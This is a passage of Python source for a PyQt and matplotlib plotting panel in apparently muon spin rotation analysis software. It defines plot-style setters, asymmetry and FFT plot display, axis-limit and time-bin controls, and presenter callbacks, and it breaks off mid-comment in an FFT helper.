elif box_id == self.plot_style_box.title:
self.plot_style_box.on_pressed()
elif box_id == self.asymmetry_param_box.title:
self.asymmetry_param_box.on_pressed()
def set_first_selected(self):
if self.item_tree.topLevelItemCount() > 0:
self.item_tree.setCurrentItem(self.item_tree.topLevelItem(0))
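        # A "*" entry is used as a placeholder when the selected runs have mixed values for a style
        # option: _check_add_star adds the placeholder before it is selected and removes it again
        # once a concrete value is chosen.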
def _check_add_star(self, box, remove=False):
for i in range(box.count()):
if box.itemText(i) == "*":
if remove:
box.removeItem(i)
return
else:
if not remove:
box.addItem("*")
def set_alpha(self, alpha):
self.asymmetry_param_box.alpha_input.setText(alpha)
def set_default_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.all_color_options, False)
else:
self._check_add_star(self.plot_style_box.all_color_options, True)
self.plot_style_box.all_color_options.setCurrentText(color)
def set_linestyle(self, linestyle):
if linestyle == "*":
self._check_add_star(self.plot_style_box.linestyle_options, False)
else:
self._check_add_star(self.plot_style_box.linestyle_options, True)
self.plot_style_box.linestyle_options.setCurrentText(linestyle)
def set_line_color(self, line_color):
if line_color == "*":
self._check_add_star(self.plot_style_box.line_color_options, False)
else:
self._check_add_star(self.plot_style_box.line_color_options, True)
self.plot_style_box.line_color_options.setCurrentText(line_color)
def set_line_width(self, line_width):
if line_width == "*":
self._check_add_star(self.plot_style_box.line_width_options, False)
else:
self._check_add_star(self.plot_style_box.line_width_options, True)
self.plot_style_box.line_width_options.setCurrentText(line_width)
def set_marker(self, marker):
if marker == "*":
self._check_add_star(self.plot_style_box.marker_options, False)
else:
self._check_add_star(self.plot_style_box.marker_options, True)
self.plot_style_box.marker_options.setCurrentText(marker)
def set_marker_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.marker_color_options, False)
else:
self._check_add_star(self.plot_style_box.marker_color_options, True)
self.plot_style_box.marker_color_options.setCurrentText(color)
def set_fit_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.fit_color_options, False)
else:
self._check_add_star(self.plot_style_box.fit_color_options, True)
self.plot_style_box.fit_color_options.setCurrentText(color)
def set_marker_size(self, size):
if size == "*":
self._check_add_star(self.plot_style_box.marker_size_options, False)
else:
self._check_add_star(self.plot_style_box.marker_size_options, True)
self.plot_style_box.marker_size_options.setCurrentText(size)
def set_fillstyle(self, fillstyle):
if fillstyle == "*":
self._check_add_star(self.plot_style_box.fillstyle_options, False)
else:
self._check_add_star(self.plot_style_box.fillstyle_options, True)
self.plot_style_box.fillstyle_options.setCurrentText(fillstyle)
def set_errorbar_style(self, style):
if style == "*":
self._check_add_star(self.plot_style_box.errorbar_style_options, False)
else:
self._check_add_star(self.plot_style_box.errorbar_style_options, True)
self.plot_style_box.errorbar_style_options.setCurrentText(style)
def set_errorbar_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.errorbar_color_options, False)
else:
self._check_add_star(self.plot_style_box.errorbar_color_options, True)
self.plot_style_box.errorbar_color_options.setCurrentText(color)
def set_errorbar_width(self, width):
if width == "*":
self._check_add_star(self.plot_style_box.errorbar_width_options, False)
else:
self._check_add_star(self.plot_style_box.errorbar_width_options, True)
self.plot_style_box.errorbar_width_options.setCurrentText(width)
class PlotDisplay(FigureCanvas):
def __init__(self, settings):
self.__system_service = services.SystemService()
self._draw_pending = True
self._is_drawing = True
self._settings = settings
FigureCanvas.__init__(self, plt.figure())
axes = self.figure.subplots(2, 1, gridspec_kw={'height_ratios': [2, 1]})
self.axes_time = axes[0]
self.axes_freq = axes[1]
self._style = self.set_stylesheet()
self.set_blank()
def set_stylesheet(self):
style = self.__system_service.get_theme_preference()
if style == self.__system_service.Themes.DEFAULT:
if darkdetect.isDark():
style = self.__system_service.Themes.DARK
else:
style = self.__system_service.Themes.LIGHT
if style == self.__system_service.Themes.DARK:
self.figure.set_facecolor(resources.DARK_COLOR)
self.axes_freq.set_facecolor(resources.DARK_COLOR)
self.axes_time.set_facecolor(resources.DARK_COLOR)
elif style == self.__system_service.Themes.LIGHT:
self.figure.set_facecolor(resources.LIGHT_COLOR)
self.axes_freq.set_facecolor(resources.LIGHT_COLOR)
self.axes_time.set_facecolor(resources.LIGHT_COLOR)
self.axes_time.figure.canvas.draw()
self._style = style
return style
def set_blank(self):
tick_color = resources.LIGHT_COLOR
if self._style == self.__system_service.Themes.DARK:
tick_color = resources.DARK_COLOR
title_font_size = 12
self.axes_time.spines['right'].set_visible(False)
self.axes_time.spines['top'].set_visible(False)
self.axes_time.spines['left'].set_visible(False)
self.axes_time.spines['bottom'].set_visible(False)
self.axes_time.tick_params(axis='x', colors=tick_color)
self.axes_time.tick_params(axis='y', colors=tick_color)
self.axes_freq.spines['right'].set_visible(False)
self.axes_freq.spines['top'].set_visible(False)
self.axes_freq.spines['left'].set_visible(False)
self.axes_freq.spines['bottom'].set_visible(False)
self.axes_freq.set_title("Load '.msr', '.dat' or '.asy' files and press 'Plot' to see data.",
fontsize=title_font_size)
self.axes_freq.title.set_color("#c0c0c0")
self.axes_freq.tick_params(axis='x', colors=tick_color)
self.axes_freq.tick_params(axis='y', colors=tick_color)
self.axes_time.figure.canvas.draw()
def set_style(self):
tick_color = resources.DARK_COLOR
if self._style == self.__system_service.Themes.DARK:
tick_color = resources.LIGHT_COLOR
self.axes_time.tick_params(axis='x', colors=tick_color)
self.axes_time.tick_params(axis='y', colors=tick_color)
self.axes_time.spines['left'].set_color(tick_color)
self.axes_time.spines['bottom'].set_color(tick_color)
self.axes_freq.tick_params(axis='x', colors=tick_color)
self.axes_freq.tick_params(axis='y', colors=tick_color)
self.axes_freq.spines['left'].set_color(tick_color)
self.axes_freq.spines['bottom'].set_color(tick_color)
title_font_size = 12
self.axes_time.spines['right'].set_visible(False)
self.axes_time.spines['top'].set_visible(False)
self.axes_time.spines['left'].set_visible(True)
self.axes_time.spines['bottom'].set_visible(True)
self.axes_time.set_xlabel("Time (" + chr(956) + "s)", fontsize=title_font_size)
self.axes_time.set_ylabel("Asymmetry", fontsize=title_font_size)
self.axes_time.xaxis.label.set_color(tick_color)
self.axes_time.yaxis.label.set_color(tick_color)
self.axes_freq.spines['right'].set_visible(False)
self.axes_freq.spines['top'].set_visible(False)
self.axes_freq.spines['left'].set_visible(True)
self.axes_freq.spines['bottom'].set_visible(True)
self.axes_freq.set_xlabel(r'Frequency (MHz)', fontsize=title_font_size)
self.axes_freq.set_ylabel(r'FFT$^2$', fontsize=title_font_size)
self.axes_freq.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
self.axes_freq.xaxis.label.set_color(tick_color)
self.axes_freq.yaxis.label.set_color(tick_color)
self.axes_time.figure.canvas.draw()
self.figure.tight_layout()
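        # plot_asymmetry draws a single run: any per-component color passed as 'Default' falls back
        # to the run's base color, error bars are drawn only when an uncertainty array is supplied
        # and the errorbar style is not 'none', and the fit curve (if any) is overlaid as a plain
        # line in the fit color and linestyle.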
def plot_asymmetry(self, time, asymmetry, uncertainty, fit, color, marker_color, line_color, errorbar_color,
fit_color, linestyle, marker, errorbar_style, fillstyle, line_width, marker_size,
errorbar_width,
fit_linestyle):
marker_color = color if marker_color == 'Default' else marker_color
line_color = color if line_color == 'Default' else line_color
errorbar_color = color if errorbar_color == 'Default' else errorbar_color
marker_face_color = marker_color if fillstyle != 'none' else 'none'
fit_color = color if fit_color == 'Default' else fit_color
if uncertainty is not None and errorbar_style != 'none':
self.axes_time.errorbar(time, asymmetry, uncertainty, mfc=marker_face_color, mec=marker_color,
color=color, linestyle=linestyle, marker=marker, fillstyle=fillstyle,
linewidth=line_width, markersize=marker_size,
elinewidth=errorbar_width,
ecolor=errorbar_color, capsize=errorbar_style)
else:
self.axes_time.plot(time, asymmetry, mfc=marker_face_color, mec=marker_color, color=color,
linestyle=linestyle, marker=marker, fillstyle=fillstyle,
linewidth=line_width,
markersize=marker_size)
if fit is not None:
self.axes_time.plot(time, fit, color=fit_color, linestyle=fit_linestyle,
marker='None')
def plot_fft(self, frequencies, fft, color, label):
self.axes_freq.plot(frequencies, fft, color=color, label=label)
def set_asymmetry_plot_limits(self, max_asymmetry, min_asymmetry):
if not self._settings.is_asymmetry_auto():
try:
y_min = self._settings.get_min_asymmetry()
y_max = self._settings.get_max_asymmetry()
except ValueError:
WarningMessageDialog.launch(["Invalid asymmetry limits."])
return
self.axes_time.set_ylim(y_min, y_max)
else:
y_min = min_asymmetry - abs(min_asymmetry * 0.1)
y_max = max_asymmetry + abs(max_asymmetry * 0.1)
self.axes_time.set_ylim(y_min, y_max)
self._settings.set_min_asymmetry(y_min)
self._settings.set_max_asymmetry(y_max)
def set_fft_plot_limits(self, max_fft, max_freq=None):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.axes_freq.set_ylim(0, max_fft * 1.1)
if not self._settings.is_freq_auto():
try:
x_min = self._settings.get_min_freq()
x_max = self._settings.get_max_freq()
except ValueError:
WarningMessageDialog.launch(["Invalid frequency limits."])
return
self.axes_freq.set_xlim(x_min, x_max)
else:
self._settings.set_min_freq(0)
self._settings.set_max_freq(max_freq)
def finish_plotting(self):
self.set_style()
self.axes_time.figure.canvas.draw()
def start_plotting(self):
self.axes_time.clear()
self.axes_freq.clear()
def set_full_blank(self):
self.setEnabled(False)
self.set_blank()
self.axes_time.figure.canvas.draw()
class PlotControl(QtWidgets.QWidget):
def __init__(self):
QtWidgets.QWidget.__init__(self)
self._label_slider_bin = QtWidgets.QLabel('')
self._label_input_bin = QtWidgets.QLabel('Time Bins (ns)')
self.slider_bin = QtWidgets.QSlider(qt_constants.Horizontal)
self.input_bin = QtWidgets.QLineEdit()
self._label_time = QtWidgets.QLabel('Time')
self._label_time_xmin = QtWidgets.QLabel('XMin')
self._label_time_xmax = QtWidgets.QLabel('XMax')
self._label_time_ymin = QtWidgets.QLabel('YMin')
self._label_time_ymax = QtWidgets.QLabel('YMax')
self._label_time_yauto = QtWidgets.QLabel('Auto Y')
self.input_time_xmin = QtWidgets.QLineEdit()
self.input_time_xmax = QtWidgets.QLineEdit()
self.input_time_ymin = QtWidgets.QLineEdit()
self.input_time_ymax = QtWidgets.QLineEdit()
self.check_time_yauto = QtWidgets.QCheckBox()
self._label_freq = QtWidgets.QLabel('Frequency')
self._label_freq_xmin = QtWidgets.QLabel('XMin')
self._label_freq_xmax = QtWidgets.QLabel('XMax')
self._label_freq_xauto = QtWidgets.QLabel('Auto X')
self.input_freq_xmin = QtWidgets.QLineEdit()
self.input_freq_xmax = QtWidgets.QLineEdit()
self.check_freq_xauto = QtWidgets.QCheckBox()
self._set_widget_attributes()
self._set_widget_tooltips()
self._set_widget_dimensions()
self._set_widget_layout()
def _set_widget_attributes(self):
self.check_freq_xauto.setChecked(True)
self.check_time_yauto.setChecked(True)
self.input_time_xmin.setText("0")
self.input_time_xmax.setText("8")
self.input_time_ymin.setText("-0.3")
self.input_time_ymax.setText("-0.5")
self.input_freq_xmin.setText("0.0")
self.input_freq_xmax.setText("1.0")
self.input_time_ymin.setEnabled(False)
self.input_time_ymax.setEnabled(False)
self.input_freq_xmin.setEnabled(False)
self.input_freq_xmax.setEnabled(False)
self.slider_bin.setMinimum(1)
self.slider_bin.setMaximum(500)
self.slider_bin.setValue(150)
self.slider_bin.setTickPosition(QtWidgets.QSlider.TicksBothSides)
self.slider_bin.setTickInterval(20)
self.input_bin.setText(str(self.slider_bin.value()))
def _set_widget_tooltips(self):
self._label_input_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self.slider_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self.input_bin.setToolTip("Set the size of the bin (in ns) for the asymmetries")
self._label_time_xmin.setToolTip("Minimum time value of range to be displayed")
self._label_time_xmax.setToolTip("Maximum time value of range to be displayed")
self._label_time_ymin.setToolTip("Minimum time value of asymmetry to be displayed")
self._label_time_ymax.setToolTip("Maximum time value of asymmetry to be displayed")
self._label_time_yauto.setToolTip("Automatically determine y-axis limits")
self.input_time_xmin.setToolTip("Minimum time value of range to be displayed")
self.input_time_xmax.setToolTip("Maximum time value of range to be displayed")
self.input_time_ymin.setToolTip("Minimum time value of asymmetry to be displayed")
self.input_time_ymax.setToolTip("Maximum time value of asymmetry to be displayed")
self.check_time_yauto.setToolTip("Automatically determine y-axis limits")
self._label_freq_xmin.setToolTip("Minimum frequency value to be displayed")
self._label_freq_xmax.setToolTip("Maximum frequency value to be displayed")
self._label_freq_xauto.setToolTip("Automatically determine frequency limits")
self.input_freq_xmin.setToolTip("Minimum frequency value to be displayed")
self.input_freq_xmax.setToolTip("Maximum frequency value to be displayed")
self.check_freq_xauto.setToolTip("Automatically determine frequency limits")
def _set_widget_dimensions(self):
box_size = 20
self.input_time_xmin.setMinimumWidth(box_size)
self.input_time_xmax.setMinimumWidth(box_size)
self.input_time_ymin.setMinimumWidth(box_size)
self.input_time_ymax.setMinimumWidth(box_size)
self.input_freq_xmin.setMinimumWidth(box_size)
self.input_freq_xmax.setMinimumWidth(box_size)
self.input_bin.setFixedWidth(50)
def _set_widget_layout(self):
main_layout = QtWidgets.QVBoxLayout()
row_1 = QtWidgets.QHBoxLayout()
row_1.addWidget(self._label_input_bin)
row_1.addWidget(self.input_bin)
row_1.addWidget(self.slider_bin)
main_layout.addLayout(row_1)
time_form = QtWidgets.QGroupBox('Time')
time_form.setMaximumHeight(110)
time_layout = QtWidgets.QFormLayout()
time_grid = QtWidgets.QGridLayout()
time_grid.addWidget(self._label_time_xmin, 0, 2)
time_grid.addWidget(self.input_time_xmin, 0, 3)
time_grid.addWidget(self._label_time_xmax, 0, 4)
time_grid.addWidget(self.input_time_xmax, 0, 5)
time_grid.addWidget(self._label_time_yauto, 1, 0)
time_grid.addWidget(self.check_time_yauto, 1, 1)
time_grid.addWidget(self._label_time_ymin, 1, 2)
time_grid.addWidget(self.input_time_ymin, 1, 3)
time_grid.addWidget(self._label_time_ymax, 1, 4)
time_grid.addWidget(self.input_time_ymax, 1, 5)
temp_row = QtWidgets.QHBoxLayout()
temp_row.addLayout(time_grid)
time_layout.addRow(temp_row)
time_form.setLayout(time_layout)
freq_form = QtWidgets.QGroupBox('Frequency')
freq_form.setMaximumHeight(110)
freq_layout = QtWidgets.QFormLayout()
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(self._label_freq_xauto)
hbox.addWidget(self.check_freq_xauto)
hbox.addWidget(self._label_freq_xmin)
hbox.addWidget(self.input_freq_xmin)
hbox.addWidget(self._label_freq_xmax)
hbox.addWidget(self.input_freq_xmax)
temp_row = QtWidgets.QHBoxLayout()
temp_row.addLayout(hbox)
freq_layout.addRow(temp_row)
freq_form.setLayout(freq_layout)
editor_layout = QtWidgets.QHBoxLayout()
editor_layout.addWidget(time_form)
editor_layout.addWidget(freq_form)
main_layout.addLayout(editor_layout)
self.setLayout(main_layout)
def get_max_time(self):
return float(self.input_time_xmax.text())
def get_min_time(self):
return float(self.input_time_xmin.text())
def get_max_freq(self):
return float(self.input_freq_xmax.text())
def get_min_freq(self):
return float(self.input_freq_xmin.text())
def get_max_asymmetry(self):
return float(self.input_time_ymax.text())
def get_min_asymmetry(self):
return float(self.input_time_ymin.text())
def get_max_fft(self):
return float(self.input_freq_ymax.text())
def get_min_fft(self):
return float(self.input_freq_ymin.text())
def get_bin_from_input(self):
return float(self.input_bin.text())
def get_bin_from_slider(self):
return float(self.slider_bin.value())
def is_asymmetry_auto(self):
return self.check_time_yauto.isChecked()
def is_freq_auto(self):
return self.check_freq_xauto.isChecked()
def set_enabled_asymmetry_auto(self, enabled):
self.input_time_ymin.setEnabled(enabled)
self.input_time_ymax.setEnabled(enabled)
def set_enabled_frequency_auto(self, enabled):
self.input_freq_xmin.setEnabled(enabled)
self.input_freq_xmax.setEnabled(enabled)
def set_max_time(self, value):
self.input_time_xmax.setText('{0:.3f}'.format(value))
def set_min_time(self, value):
self.input_time_xmin.setText('{0:.3f}'.format(value))
def set_max_freq(self, value):
self.input_freq_xmax.setText('{0:.3f}'.format(value))
def set_min_freq(self, value):
self.input_freq_xmin.setText('{0:.3f}'.format(value))
def set_max_asymmetry(self, value):
self.input_time_ymax.setText('{0:.3f}'.format(value))
def set_min_asymmetry(self, value):
self.input_time_ymin.setText('{0:.3f}'.format(value))
def set_bin_input(self, value):
self.input_bin.setText(str(value))
def set_bin_slider(self, value):
self.slider_bin.setValue(int(value))
def __init__(self):
super(Panel, self).__init__()
super(QtWidgets.QWidget, self).__init__()
self.support_panel = PlottingPanel.SupportPanel()
self.left_settings = self.PlotControl()
self.left_display = self.PlotDisplay(self.left_settings)
self.right_settings = self.PlotControl()
self.right_display = self.PlotDisplay(self.right_settings)
self.legend_display = self.support_panel.legend_box
self._set_widget_layout()
self._presenter = PlottingPanelPresenter(self)
self.right_settings.input_bin.setText('5')
self.right_settings.slider_bin.setValue(5)
self.right_settings.input_time_xmax.setText('0.5')
def createSupportPanel(self) -> QtWidgets.QDockWidget:
return self.support_panel
def _set_widget_layout(self):
hbox = QtWidgets.QHBoxLayout()
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.left_display, 5)
vbox.addWidget(self.left_settings)
hbox.addLayout(vbox)
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.right_display, 5)
vbox.addWidget(self.right_settings)
hbox.addLayout(vbox)
self.setLayout(hbox)
class PlottingPanelPresenter(PanelPresenter):
def __init__(self, view: PlottingPanel):
super().__init__(view)
self.__run_service = services.RunService()
self.__style_service = services.StyleService()
self.__run_service.signals.added.connect(self.update)
self.__run_service.signals.changed.connect(self.update_after_change)
self.__populating_settings = False
self.__update_alpha = True
self.__logger = logging.getLogger(__name__)
self.__system_service = services.SystemService()
self._set_callbacks()
def _set_callbacks(self):
self._view.left_settings.input_time_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_time_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_time_ymin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_time_ymax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
        self._view.left_settings.check_time_yauto.stateChanged.connect(
            lambda: self._on_check_parameter_changed('left'))
self._view.left_settings.input_freq_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.input_freq_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('left'))
self._view.left_settings.check_freq_xauto.stateChanged.connect(lambda: self._on_check_parameter_changed('left'))
self._view.left_settings.slider_bin.sliderMoved.connect(lambda: self._on_bin_parameter_changed('left', True))
self._view.left_settings.slider_bin.sliderReleased.connect(
lambda: self._on_bin_parameter_changed('left', False))
self._view.left_settings.input_bin.returnPressed.connect(lambda: self._on_bin_parameter_changed('left', False))
self._view.right_settings.input_time_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_time_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_time_ymin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_time_ymax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
        self._view.right_settings.check_time_yauto.stateChanged.connect(
            lambda: self._on_check_parameter_changed('right'))
self._view.right_settings.input_freq_xmin.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.input_freq_xmax.returnPressed.connect(
lambda: self._on_spectrum_settings_changed('right'))
self._view.right_settings.check_freq_xauto.stateChanged.connect(
lambda: self._on_check_parameter_changed('right'))
self._view.right_settings.slider_bin.sliderMoved.connect(lambda: self._on_bin_parameter_changed('right', True))
self._view.right_settings.slider_bin.sliderReleased.connect(
lambda: self._on_bin_parameter_changed('right', False))
self._view.right_settings.input_bin.returnPressed.connect(
lambda: self._on_bin_parameter_changed('right', False))
self._view.support_panel.plot_button.pressed.connect(self._on_plot_clicked)
self._view.support_panel.plot_all_button.pressed.connect(self._on_plot_all_clicked)
self._view.support_panel.clear_all_button.pressed.connect(self._on_clear_all_clicked)
self._view.support_panel.asymmetry_param_box.alpha_input.returnPressed.connect(self._on_alpha_changed)
self._view.support_panel.plot_style_box.all_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.DEFAULT_COLOR,
self._view.support_panel.plot_style_box.all_color_options.currentText()))
self._view.support_panel.plot_style_box.linestyle_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.LINESTYLE,
self._view.support_panel.plot_style_box.linestyle_options.currentText()))
self._view.support_panel.plot_style_box.line_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.LINE_COLOR,
self._view.support_panel.plot_style_box.line_color_options.currentText()))
self._view.support_panel.plot_style_box.line_width_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.LINE_WIDTH,
self._view.support_panel.plot_style_box.line_width_options.currentText()))
self._view.support_panel.plot_style_box.marker_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.MARKER,
self._view.support_panel.plot_style_box.marker_options.currentText()))
self._view.support_panel.plot_style_box.marker_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.MARKER_COLOR,
self._view.support_panel.plot_style_box.marker_color_options.currentText()))
self._view.support_panel.plot_style_box.marker_size_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.MARKER_SIZE,
self._view.support_panel.plot_style_box.marker_size_options.currentText()))
self._view.support_panel.plot_style_box.fillstyle_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.FILLSTYLE,
self._view.support_panel.plot_style_box.fillstyle_options.currentText()))
self._view.support_panel.plot_style_box.errorbar_style_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.ERRORBAR_STYLE,
self._view.support_panel.plot_style_box.errorbar_style_options.currentText()))
self._view.support_panel.plot_style_box.errorbar_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.ERRORBAR_COLOR,
self._view.support_panel.plot_style_box.errorbar_color_options.currentText()))
self._view.support_panel.plot_style_box.errorbar_width_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.ERRORBAR_WIDTH,
self._view.support_panel.plot_style_box.errorbar_width_options.currentText()))
self._view.support_panel.plot_style_box.fit_color_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.FIT_COLOR,
self._view.support_panel.plot_style_box.fit_color_options.currentText()))
self._view.support_panel.plot_style_box.fit_linestyle_options.currentTextChanged.connect(
lambda: self._on_style_parameter_changed(self.__style_service.Keys.FIT_LINESTYLE,
self._view.support_panel.plot_style_box.fit_linestyle_options.currentText()))
self._view.support_panel.item_tree.itemSelectionChanged.connect(self._populate_settings)
self.__system_service.signals.theme_changed.connect(self._on_theme_changed)
@QtCore.pyqtSlot()
def _on_spectrum_settings_changed(self, side):
self._start_update(side)
@QtCore.pyqtSlot()
def _on_style_parameter_changed(self, key, value):
if not self.__populating_settings:
ids = self._view.support_panel.item_tree.get_selected()
self.__style_service.change_style_parameter(ids, key, value)
self._start_update('both')
@QtCore.pyqtSlot()
def _on_plot_all_clicked(self):
self._view.support_panel.item_tree.set_all_checked(True)
self._plot()
@QtCore.pyqtSlot()
def _on_plot_clicked(self):
self._plot()
@QtCore.pyqtSlot()
def _on_clear_all_clicked(self):
self._view.support_panel.item_tree.set_all_checked(False)
self._view.legend_display.set_blank()
self._start_update(side='both')
@QtCore.pyqtSlot()
def _on_bin_parameter_changed(self, side, moving):
if side == 'left':
settings = self._view.left_settings
else:
settings = self._view.right_settings
if moving:
value = settings.get_bin_from_slider()
settings.set_bin_input(value)
if value % 5 != 0:
return
else:
bin_size = settings.get_bin_from_input()
if bin_size <= 0:
WarningMessageDialog.launch(["Cannot set bin size to {}.".format(bin_size)]) # FIXME just use args*
return
settings.set_bin_slider(settings.get_bin_from_input())
self._start_update(side)
@QtCore.pyqtSlot()
def _on_check_parameter_changed(self, side):
if side == 'left':
settings = self._view.left_settings
else:
settings = self._view.right_settings
settings.set_enabled_asymmetry_auto(not settings.is_asymmetry_auto())
settings.set_enabled_frequency_auto(not settings.is_freq_auto())
@QtCore.pyqtSlot()
def _on_alpha_changed(self):
self.update_alpha()
@QtCore.pyqtSlot()
def _on_theme_changed(self):
self._view.left_display.set_stylesheet()
self._view.right_display.set_stylesheet()
if self._view.left_display.axes_time.lines:
self._view.left_display.set_style()
self._view.right_display.set_style()
else:
self._view.left_display.set_blank()
self._view.right_display.set_blank()
def _update_canvas(self, settings, display, side, fast=False):
ids = self._view.support_panel.item_tree.get_run_ids()
runs = self.__run_service.get_runs_by_ids(ids)
display.start_plotting()
if len(runs) == 0:
display.set_full_blank()
self._view.legend_display.set_blank()
return
else:
self._view.setEnabled(True)
max_asymmetry = -1
min_asymmetry = 1
max_fft = 0
min_time = settings.get_min_time()
max_time = settings.get_max_time()
bin_size = settings.get_bin_from_input()
legend_values = {}
for run in runs:
if run.asymmetries[objects.RunDataset.FULL_ASYMMETRY] is None:
continue
if side == 'left':
asymmetry = run.asymmetries[objects.RunDataset.FULL_ASYMMETRY].bin(bin_size).cut(min_time, max_time)
run.asymmetries[objects.RunDataset.LEFT_BINNED_ASYMMETRY] = asymmetry
else:
asymmetry = run.asymmetries[objects.RunDataset.FULL_ASYMMETRY].bin(bin_size).cut(min_time, max_time)
run.asymmetries[objects.RunDataset.RIGHT_BINNED_ASYMMETRY] = asymmetry
time = asymmetry.time
uncertainty = asymmetry.uncertainty
fit = asymmetry.calculated
style = self.__style_service.get_style_by_run_id(run.id)
legend_values[run.id] = (
style[self.__style_service.Keys.LABEL], style[self.__style_service.Keys.DEFAULT_COLOR]
if style[self.__style_service.Keys.MARKER_COLOR] == 'Default' else style[
self.__style_service.Keys.MARKER_COLOR])
            # Compute the limits manually here because matplotlib's automatic axis limits are often poor for this data
frac_start = float(min_time) / (time[len(time) - 1] - time[0])
frac_end = float(max_time) / (time[len(time) - 1] - time[0])
start_index = int(np.floor(len(asymmetry) * frac_start))
end_index = int(np.floor(len(asymmetry) * frac_end))
local_max = np.max(asymmetry[start_index:end_index])
max_asymmetry = local_max if local_max > max_asymmetry else max_asymmetry
local_min = np.min(asymmetry[start_index:end_index])
min_asymmetry = local_min if local_min < min_asymmetry else min_asymmetry
display.plot_asymmetry(time, asymmetry, uncertainty, fit,
color=style[self.__style_service.Keys.DEFAULT_COLOR],
marker=style[self.__style_service.Keys.MARKER],
linestyle=style[self.__style_service.Keys.LINESTYLE],
fillstyle=style[self.__style_service.Keys.FILLSTYLE],
marker_color=style[self.__style_service.Keys.MARKER_COLOR],
marker_size=style[self.__style_service.Keys.MARKER_SIZE],
line_color=style[self.__style_service.Keys.LINE_COLOR],
line_width=style[self.__style_service.Keys.LINE_WIDTH],
errorbar_color=style[self.__style_service.Keys.ERRORBAR_COLOR],
errorbar_style=style[self.__style_service.Keys.ERRORBAR_STYLE],
errorbar_width=style[self.__style_service.Keys.ERRORBAR_WIDTH],
fit_color=style[self.__style_service.Keys.FIT_COLOR],
fit_linestyle=style[self.__style_service.Keys.FIT_LINESTYLE])
if not fast:
f_min = settings.get_min_freq()
if settings.is_freq_auto():
f_max = 1 / (2 * (bin_size / 1000))
else:
f_max = settings.get_max_freq()
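                    # Illustrative check of the auto limit above: with the default 150 ns bin,
                    # the Nyquist frequency is 1 / (2 * 0.150 us) ~ 3.33 MHz.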
frequencies, fft = self.get_fft_data(time, asymmetry, min_time, max_time, bin_size, f_min, f_max)
local_max = np.max(fft)
max_fft = local_max if local_max > max_fft else max_fft
display.plot_fft(frequencies, fft,
style[self.__style_service.Keys.DEFAULT_COLOR],
style[self.__style_service.Keys.LABEL])
display.set_fft_plot_limits(max_fft, f_max)
display.set_asymmetry_plot_limits(max_asymmetry, min_asymmetry)
display.finish_plotting()
self._view.legend_display.set_legend(legend_values)
@QtCore.pyqtSlot()
def update(self, runs_changed=False):
run_datasets = self.__run_service.get_runs()
alphas = {'{:.5f}'.format(run.asymmetries[run.FULL_ASYMMETRY].alpha) for run in run_datasets if
run.asymmetries[run.FULL_ASYMMETRY] is not None}
self.__update_alpha = False
if len(alphas) == 1:
self._view.support_panel.asymmetry_param_box.alpha_input.setText(alphas.pop())
else:
self._view.support_panel.asymmetry_param_box.alpha_input.setText('1.0')
self.__update_alpha = True
for run in run_datasets:
self.__style_service.add_style_for_run(run, False, True)
if runs_changed:
self._start_update('both')
self._populate_settings()
def _plot(self):
def _verify_asymmetries_are_calculated():
runs_without_asymmetries = []
for run in runs:
if run.asymmetries[objects.RunDataset.FULL_ASYMMETRY] is None:
runs_without_asymmetries.append(run)
if len(runs_without_asymmetries) > 0:
code = PlotFileDialog.launch([runs_without_asymmetries])
if code == PlotFileDialog.Codes.NO_FILES_PLOTTED:
return False
return True
ids = self._view.support_panel.item_tree.get_run_ids()
runs = self.__run_service.get_runs_by_ids(ids)
verified = _verify_asymmetries_are_calculated()
if not verified:
return
self._start_update(side='both')
def update_after_change(self):
self.update(True)
def update_alpha(self):
if not self.__update_alpha:
return
try:
alpha = float(self._view.support_panel.asymmetry_param_box.alpha_input.text())
except ValueError:
return
ids = self._view.support_panel.item_tree.get_selected()
if len(ids) > 0:
self.__run_service.update_alphas(ids, [alpha])
def get_fft_data(self, time, asymmetry, x_min, x_max, bin_size, f_min, f_max):
num_bins = int((float(x_max) - float(x_min)) / (float(bin_size) / 1000))
start_bin = int(float(x_min) / (float(bin_size) / 1000))
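        # Worked example (using the right-hand panel defaults set further down in this file):
        # with bin_size = 5 ns and x_min/x_max = 0/0.5 us, num_bins = 0.5 / 0.005 = 100 and
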